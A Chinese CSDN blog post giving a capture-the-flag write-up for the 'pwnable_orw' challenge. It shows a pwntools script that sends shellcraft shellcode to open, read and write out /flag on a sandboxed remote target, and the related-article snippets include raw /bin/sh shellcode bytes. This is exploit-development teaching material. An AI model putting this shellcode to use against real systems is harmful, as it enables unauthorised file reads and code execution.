shellcraft新姿势

最新推荐文章于 2022-12-04 12:08:37 发布
最新推荐文章于 2022-12-04 12:08:37 发布
阅读量1.3k 收藏
点赞数 2
分类专栏: 2021年强网杯归纳 文章标签: c语言 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/am_03/article/details/120029396
版权

pwnable_orw
exp 脚本
这道题的难度在于只能调用 open read 和 write ,学到了 shellcraft 新的使用方式
from pwn import *
io = remote(‘node3.buuoj.cn’,25539)
context.binary = ‘orw’
elf = ELF(‘orw’)
shellcode = shellcraft.open(’/flag’)
shellcode += shellcraft.read(‘eax’,‘esp’,100)
shellcode += shellcraft.write(1,‘esp’,100)
shellcode = asm(shellcode)
sleep(0.2)
io.sendline(shellcode)
io.interactive()

这三个函数在pwntools的原型
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在调用open函数后文件描述符fd在rax里,rsp为栈指针寄存器,指向buf

彬彬有礼am_03
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
pwntools的基本用法
weixin_44222568的博客
09-15 4175
一、实验名称 pwntools的基本用法 二、实验目的和要求 1.掌握pwntools的基本使用方法 2.掌握如何编写exploit 三、实验内容 1.Process 2.Attach 3.Shellcraft 四、实验环境(软、硬件环境,主要仪器设备) Linux操作系统,pwntools 五、实验数据记录 1.交互 本地:sh=process("./2.dms") 远程:sh=remote(“127.0.0.1”,10001) (1)127.0.0.1表示本地测验,实际题目容器会给定IP地址和端口,连接
ROP的基本原理和实战教学,看这一篇就够了
最新发布
QL_2023的博客
02-21 1874
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)。通过上一篇文章栈溢出漏洞原理详解与利用,我们可以发现栈溢出的控制点是ret处,那么ROP的核心思想就是利用以ret结尾的指令序列把栈中的应该返回EIP的地址更改成我们需要的值,从而控制程序的执行流程。
shellcraft
05-29
mac 下ssh的工具,好用界面清爽简洁,解压后直接安装即可使用,缺点就是传输文件不是那么方便,看需使用
pwn——沙箱机制
djhtdjdywgjc的博客
11-20 1521
pwn沙箱
linux 栈溢出
sky123博客
02-01 3692
栈基础知识 栈结构 函数调用过程 32位为例: KaTeX parse error: No such environment: align* at position 8: \begin{̲a̲l̲i̲g̲n̲*̲}̲ & \text{push a… 函数参数传递 32位程序 普通函数传参:参数基本都压在栈上(有寄存器传参的情况,可查阅相关资料)。 syscall传参:eax对应系统调用号,ebx、ecx、edx、esi、edi、ebp分别对应前六个参数多余的参数压在栈上。 64位程序: 普
linux上的shellcode写法(pwntools,手写shell
逆向萌新的博客
07-16 3050
这些连在一起,则生成shell是/bin///之后下面就是调用,movebx,esp这步就是必须存在的,之后中间是调用的方法,最后是调用SYS_execve来运行这个/bin////sh但是如果最后在输入的时候长度不够写入这么多的时候,这个脚本就要更变,在针对没开NX保护的程序的时候,我们可以想着在栈内执行这些,长度还不用,那么我们要进行一个更改。这里就要说到调用规则了,x64下,调用规则是rdi,rsi,rdx,rcx,r8,r9,需要按照这个去调用,这个还是调用规则的问题,最后要变成想要的样子。....
ShellCraft
12-19
一款mac下的SSH客户端。界面清爽,支持多种样式。不需要过多冗余功能的很好选择
ShellCraft for Mac安装教程.docx
07-23
ShellCraft for Mac破解版是一款Mac上优秀的SSH/Telnet客户端,如果你要做服务器管理或者与Linux打交道肯定少不了在终端操作,一般情况大家都在用中段代码来链接远程服务器或者远程ssh隧道,但是敲打命令还不如利用...
shellcraft.js:基于Commander和Inquirer的Node.js的简单CLI和Shell
05-04
文献资料安装$ npm install shellcraft你好,世界var shellcraft = require ( 'shellcraft' ) ;var options = { version : '0.1.0' ,} ;shellcraft . begin ( options , function ( err , results ) { if ( results ...
第三周pwn题
weixin_59339137的博客
12-04 386
pwn题
shell craft
12-03
首先这是一款xshell mac版本的替代版,使用方法和xshell基本一致。下载下来后,要注意!!!!一般会提示打不开(介意请勿下载),因为mac你设置的原因,自行百度解决方法。下载次数100+。我们都用着很好,打不开那没办法,我只提供工具,为了大家,就别举报了,举报了,我还要重上传,多麻烦?
替代Xshell的良心国产软件 FinalShell
07-30
FinalShell是一体化的的服务器,网络管理软件,不仅是ssh客户端,还是功能强大的开发,运维工具,充分满足开发,运维需求.
c沙箱与容器_orw技术分享
weixin_57140753的博客
11-24 1102
c沙箱与容器_orw技术分享
【CTF】【PWN】orw
m0_50819561的博客
10-09 1296
这是沙盒机制,就是限制你能使用的syscall。 seccomp-tools这个工具能快速地查出你能使用地syscall。 我们能使用的常用的构造攻击链的只有open,read,write。 但是因为限制了syscall,所以我们不能用特殊的系统调用getshell。 有两种方法,一种直接写汇编,一种利用shellcraft构造。 下面是汇编: ...
PWN总结
醉等佳人归
08-19 1359
文章目录1.ROP绕过2.radare2基本指令 1.ROP绕过 2.radare2基本指令 常用命令: 信息搜集: $ rabin2 -I ./program — 查看二进制信息 ii [q] – 查看导出表 ?v sym.imp.func_name — 获取过程链接表中相应函数的地址(func_name@PLT) ?v reloc.func_name —获取全局偏移表中函数的地址(func_name@GOT) ie [q] — 获取入口点地址 内存相关: dmm — 列出模块 (库文件,内存中加载的二进
PWN-shellcode获取与编写
热门推荐
杀生丸?不,其实我要的是桔梗
03-16 1万+
当我们在获得程序的漏洞后,就可以在程序的漏洞处执行特定的代码,而这些代码也就是俗称的shellcode。 而shellcode该怎么获得呢? 一、获取集成写好的 1.From pwntools (1)先设置目标机的参数 context(os=’linux’, arch=’amd64’, log_level=’debug’) 1. os设置系统为linux系统,在完成ctf题目的...
python2安装pwntools_pwntools安装与简单使用(初学习持续更
weixin_36465073的博客
01-24 3221
小白一枚,初学轻喷0x01.pwntools简介pwntools 是一款专门用于CTF Exploit的python库,能够很方便的进行本地与远程利用的切换,基本涵盖了pwn题利用脚本所需要的各种工具。0x02.pwntools安装在Ubuntu中安装,这个是python2的,python3不能pip安装,还要安装其他东西,在这里就不详述了sudo pip install pwntool...
Shellcode的生成和利用
qq_43390703的博客
03-08 4799
from pwn import * #pwntool生成shellcode shellcode=asm(shellcraft.sh()) shellcode = “\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05”(23字节) ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值